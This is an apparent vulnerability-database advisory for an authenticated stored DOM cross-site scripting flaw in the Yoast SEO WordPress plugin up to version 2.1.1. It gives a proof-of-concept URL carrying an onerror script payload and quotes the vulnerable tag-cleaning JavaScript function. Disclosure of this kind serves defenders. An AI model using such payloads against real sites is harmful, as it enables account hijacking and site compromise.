Yoast SEO <= 2.1.1 - Authenticated Stored DOM XSS



Description
The “snippet preview” functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2.
Proof of Concept
Vulnerable URL:
/wp-admin/post-new.php?post_title=<img src=x onerror=alert(1)>

Vulnerable Code (wordpress-seo/js/wp-seo-metabox.js):
function yst_clean(str) {
    	if (str == '' || str == undefined)
		    return '';

	    try {
		        str = jQuery('<div/>').html(str).text();
		        str = str.replace(/<\/?[^>]+>/gi, '');
		        str = str.replace(/\[(.+?)\](.+?\[\/\\1\])?/g, '');
	    } catch (e) {
	}

	return str;
}

Link: https://github.com/Yoast/wordpress-seo/blob/2.1.1/js/wp-seo-metabox.js#L1-13

Affects Plugin

fixed in version 2.2

References

CVE 2012-6692
PACKETSTORM 132294

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Charles Neill
Submitter Website https://inventropy.us/blog
Submitter Twitter ccneill
Views 6690
Verified No
WPVDB ID 8045

Timeline

Publicly Published 2015-06-12 (over 4 years ago)
Added 2015-06-12 (over 4 years ago)
Last Updated 2019-10-31 (13 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin